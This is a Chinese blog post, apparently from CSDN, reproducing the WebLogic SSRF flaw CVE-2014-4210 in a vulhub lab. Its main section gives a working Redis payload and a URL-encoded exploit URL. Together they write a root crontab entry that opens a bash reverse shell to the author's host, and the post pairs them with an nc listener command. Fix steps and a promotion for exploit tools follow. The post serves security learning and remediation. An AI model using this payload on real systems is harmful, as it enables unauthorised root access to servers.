漏洞复现CVE-2014-4210(Weblogic ssrf)

已于 2022-07-28 15:45:05 修改
阅读量1.1k 收藏
点赞数
文章标签: java servlet 开发语言
于 2022-07-28 15:20:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/deginner2/article/details/126035631
版权

最近在打vulhub的靶场记录一下,我是小菜鸡一个,不对的地方还请指教。废话不多说开始。

原因:

ip:7001/uddiexplorer/SearchPublicRegistries.jsp传参时未做过滤导致ssrf漏洞产生,导致可以对内网的服务进行扫描&攻击。

影响版本:

weblogic 10.0.2–10.3.6版本

验证过程:

1.使用nmap进行扫描,得到服务类型和端口号,对目标进行weblogic扫描,发现存在ssrf 漏洞。

2.手工进行验证,使用burp进行抓包,修改operator参数为http://127.0.0.1:7001如果开启本机开启7001端口则会返回404,输入不存在的端口则会返回:but could not connect over HTTP to server,输入一个存在的端口并且不是http协议的则会返回: which did not have a valid SOAP content-type

3.通过爆破内网地址及常用端口得到,内网中存在redis服务端口(6379),并且存在未授权漏洞,可以利用redis反弹shell。

4.以下内容使用url编码进行,将ip端口修改为自己的

test


set 1 "\n* * * * * root bash -i >& /dev/tcp/192.168.88.107/9999 0>&1\n"
config set dir /etc/
config set dbfilename crontab
save


qwesanx

5.拼接进数据包中,并且使用nc开启监听(nc -lvvp 9999),稍等一会就可以得到反弹 的shell。

6.可以使用GET方式进行利用,效果一样

http://192.168.88.108:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:7001&rdoSearch=name&txtSearchname=123&txtSearchkey=123&txtSearchfor=123&selfor=Business+location&btnSubmit=Search

http://192.168.88.108:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.20.0.2:6379/test%0a%0aset%201%20%22%5cn%2a%20%2a%20%2a%20%2a%20%2a%20root%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192%2e168%2e88%2e107%2f9999%200%3E%261%5cn%22%0aconfig%20set%20dir%20%2fetc%2f%0aconfig%20set%20dbfilename%20crontab%0asave%0a%0aqwesanx%20&rdoSearch=name&txtSearchname=123&txtSearchkey=123&txtSearchfor=123&selfor=Business+location&btnSubmit=Search

修复方式:

1.在不影响业务的情况下,删除server/lib/uddiexplorer.war下的相应jsp文件。 

#> jar -xvf uddiexplorer.war

#> rm jsp-files

#> jar -cvfM uddiexplorer.war uddiexplorer/

2.配置访问权限,取消对外开放

3.升级高版本。

关注公众号Sanx白帽子 发送 ssrf 获取对应的利用工具

Sanx.
关注
SSRF 漏洞CVE-2014-4210)】
cyyyyy123的博客
03-07 763
SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造请求,从而让服务端发起请求的一种安全漏洞。它将一个可以发起网络请求的服务当作跳板来攻击其他内部服务。SSRF的攻击目标一般是与外部隔离的内网资源。
Weblogic SSRF漏洞CVE-2014-4210复现
aa1281047341的博客
08-21 349
Weblogic SSRF漏洞CVE-2014-4210复现
Weblogic漏洞复现SSRF(CVE-2014-4210
最新发布
hhsjjsj的博客
08-06 1572
全称为Oracle WebLogic Server,是基于JavaEE服务器的中间件。
【vulhub】Weblogic_SSRF(CVE-2014-4210漏洞复现
qq_45300786的博客
04-12 315
这个真的不知道怎么回事,就是不能反弹shell,可能是我没有redis吧 还是直接放参考链接吧 https://github.com/vulhub/vulhub/blob/master/weblogic/ssrf/README.md https://blog.csdn.net/LTtiandd/article/details/99592832 https://dyblogs.cn/dy/2275.html ...
weblogic ssrf漏洞[CVE-2014-4210]
qq_43936524的博客
06-18 1164
文章目录vulhub复现环境搭建 vulhub复现 # 启动 cd vulhub/weblogic/ssrf/ docker-compose up -d # 开启了一个weblogic和redis环境 kit@VM-0-12-ubuntu:~/vulhub/weblogic/ssrf$ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS P
CVE-2014-4210 weblogic SSRF漏洞
nex1less的博客
10-21 530
0x01 漏洞地址 http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp 0x02 漏洞验证 1.访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。 2.
Weblogic_SSRF漏洞_CVE-2014-4210(未完待续)
simonnews的博客
05-25 886
Weblogic_SSRF漏洞_CVE-2014-42101 漏洞概述1.1 基础知识1.2 漏洞概述1.3 影响版本2 漏洞原理分析3 漏洞复现4 漏洞修复5 其他 1 漏洞概述 1.1 基础知识 什么是SSRF漏洞SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 1.2 漏洞
Weblogic SSRF漏洞复现CVE-2014-4210)【vulhub靶场】
m0_55854679的博客
08-09 1536
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
Weblogic SSRF(CVE-2014-4210)漏洞复现
m0_64583632的博客
02-06 538
Weblogic SSRF(CVE-2014-4210)漏洞复现
[Vulhub] Weblogic SSRF 漏洞CVE-2014-4210
weixin_45605352的博客
07-21 5768
0x00 预备知识 01 SSRF概念: SSRF(服务端请求伪造),指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 简单的说就是利用一个可发起网络请求的服务当作跳板来攻击其他服务 02 SSRF原理 SSRF的实质是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。一般情况下, SSRF攻击的目标是外网无法访问的内部系统,黑客可以利用SSRF漏洞获取内部系统的一些信息(正是因为它是由服务端
weblogic CVE-2014-4210 SSRF漏洞
ChenD的学习笔记
05-22 1770
然后直接VPS拉取vulhub的镜像出现连接不到反弹shell的问题(但是成功写入了,其实也算完成实验了),最后本地搞出来啦,结果没有ssh,猛男哭泣!redis可能存在未授权访问漏洞,同时redis默认是不对外开放的,意思就是说只有内网可以访问redis服务器,外网访问不到,这时候就体现出了SSRF请求伪造漏洞的作用。然后kali也出问题了,docker拉取的vulhub拉取的weblogic/ssrf 镜像,启动后只启动了weblogic,redis起不来,很怪异。
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
Weblogic SSRF漏洞(CVE-2014-4210)
墨鱼菜鸡
05-03 109
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 关于SSRF漏洞我们就不讲了,传送门——>SSRF(服务端请求伪造)漏洞 今天我们讲的是Weblogic存在的SSRF漏洞。 该漏洞存在于:http://ip:...
Weblogic SSRF漏洞CVE-2014-4210
weixin_39664643的博客
01-25 1151
利用范围 版本10.0.2,10.3.6 原理 Oracle WebLogic Web Server既可以被外部主机访问,同时也允许访问内部主机。比如有一个jsp页面SearchPublicReqistries.jsp,我们可以利用它进行攻击,未经授权通过weblogic server连接任意主机的任意TCP 端口,可以能冗长的响应来推断在此端口上是否有服务在监听此端口。 利用 漏洞靶场 编译及启动测试环境 docker-compose build docker-compose up -d 访问http
Gitlab SSRF 漏洞复现 CVE-2021-22214
afei001
08-03 1225
GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。当对内部网络的webhook的请求被启用时,GitLab CE/EE中一个服务器端请求伪造漏洞SSRF(影响从10.5开始的所有版本)就有可能被未经身份验证的攻击者利用,即使是在注册受限的GitLab实例上。...
linux uddi服务器,Weblogic SSRF漏洞复现CVE-2014-4210
weixin_39656174的博客
04-30 341
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。测试环境搭建编译及启动测试环境docker-compose up -d访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用。SSRF漏洞测试SSRF漏洞存在于http://your-ip:7001/uddie...
(CVE-2014-4210) Weblogic SSRF漏洞
CNXBDSa的博客
09-02 411
近期接触到了SSRF的漏洞,就进行了一下本地的复现,利用Vulhub的进行复现,别问,问就是方便,直接docker一键启动,这感觉酸爽! SSRF(服务器端请求伪造) SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值